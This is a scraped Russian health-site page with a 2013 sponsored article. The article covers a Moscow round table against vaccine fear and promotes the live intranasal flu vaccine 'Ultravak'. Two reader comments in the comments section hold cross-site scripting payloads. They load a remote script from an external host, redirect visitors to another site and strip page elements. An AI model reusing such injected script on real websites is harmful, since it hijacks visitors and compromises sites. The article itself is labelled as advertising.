Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Европейская неделя иммуни...  >>  Европейская неделя иммунизации: бояться надо не вакцинации, а вакцинофобии
 
Обратная связь
 

Европейская неделя иммунизации: бояться надо не вакцинации, а вакцинофобии

Размер шрифта
30 апреля 2013 12:05
  • google_analytics: false
  • Нравится

В преддверии Европейской Недели иммунизации в Москве по инициативе РИА АМИ при участии Минздрава РФ, Росздрава, Роспотребнадзора и ведущих специалистов России в области здравоохранения состоялся круглый стол «Борьба с вакцинофобиями: важность вакцинации как элемента здорового образа жизни».

Разговор иммунизации особенно актуален сейчас, весной, когда активизируются возбудители опасных инфекций, в частности – гриппа, клещевого энцефалита и других.

Вирус гриппа мутирует каждый год. «В начале XX века во время эпидемии «испанки» – разновидности гриппа – в мире погибли от 20 до 50 миллионов человек, – говорит участник заседания, эксперт ВОЗ, руководитель отдела вирусологии НИИ ЭМ РАМН Лариса Руденко. Это может повториться и сегодня, если мы не будем разрабатывать вакцины, проводить вакцинацию, если у нас не будет для лечения соответствующих препаратов».

Гордостью отечественных эпидемиологов и эталоном для последующих международных разработок является живая гриппозная вакцина «Ультравак» (ФГУП НПО «Микроген»). Ее разработка была начата в России еще в 1987 году, тогда как, например, в США аналогичная вакцина была зарегистрирована лишь в 2003 году. С выходом на рынок живой вакцины появилась возможность прививать детей, которые включены в национальную программу – одну из главных стратегий по профилактике гриппа среди групп населения. В 2011 году вакцина зарегистрирована в Европе, и в настоящее время, например, в Великобритании планируется привить живой гриппозной вакциной 9 миллионов детей.

Значимые преимущества новой вакцины налицо. Во-первых, интраназальный метод ее введения позволяет создавать иммунитет непосредственно в воротах инфекции, к чему стремятся разработчики всех вакцин против воздушно-капельных инфекций. Во-вторых, ослабленный живой вирус активизирует все механизмы иммунитета, как после перенесения инфекции. В-третьих, вакцина может быть произведена в больших количествах и в короткий срок, что важно для пандемических вакцин. «По договору с ВОЗ наша вакцина производится в Таиланде, Индии, Китае. Мы поставщики живого штамма гриппозной вакцины для производства во всех этих странах», – отметила Руденко.

Защитный эффект вакцины наступает через 3 недели после вакцинации и сохраняется 10-12 месяцев. Применяют для активной профилактики гриппа у взрослых без ограничения возраста и у детей с трехлетнего возраста 1 раз в осенне-зимний период ежегодно».

Подготовила Светлана Богданова

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 мая 2013 в 06:28

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы о простуде, которым пора положить конец!   Одно лекарство не даст вам умереть от гриппа!   Победа над гриппом   Вирус птичьего гриппа не дремлет  
03 февраля 2012Ученые создают универсальную вакцину от гриппа 05 февраля 2013Почему мы болеем гриппом зимой
 
06 августа 2012Вирус птичьего гриппа не дремлет! 04 июля 2012Оказывается, если вы грамотно лечите грипп, то вы защищаете себя от рака кожи
 

Слайдшоу

1
Врачи против параллельного мира
Простуда и грипп: 10 первых шагов
Грипп или простуда?

Тесты

1
Заболеет ли ваша семья?
Что вы знаете о пневмонии?
Грипп или простуда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.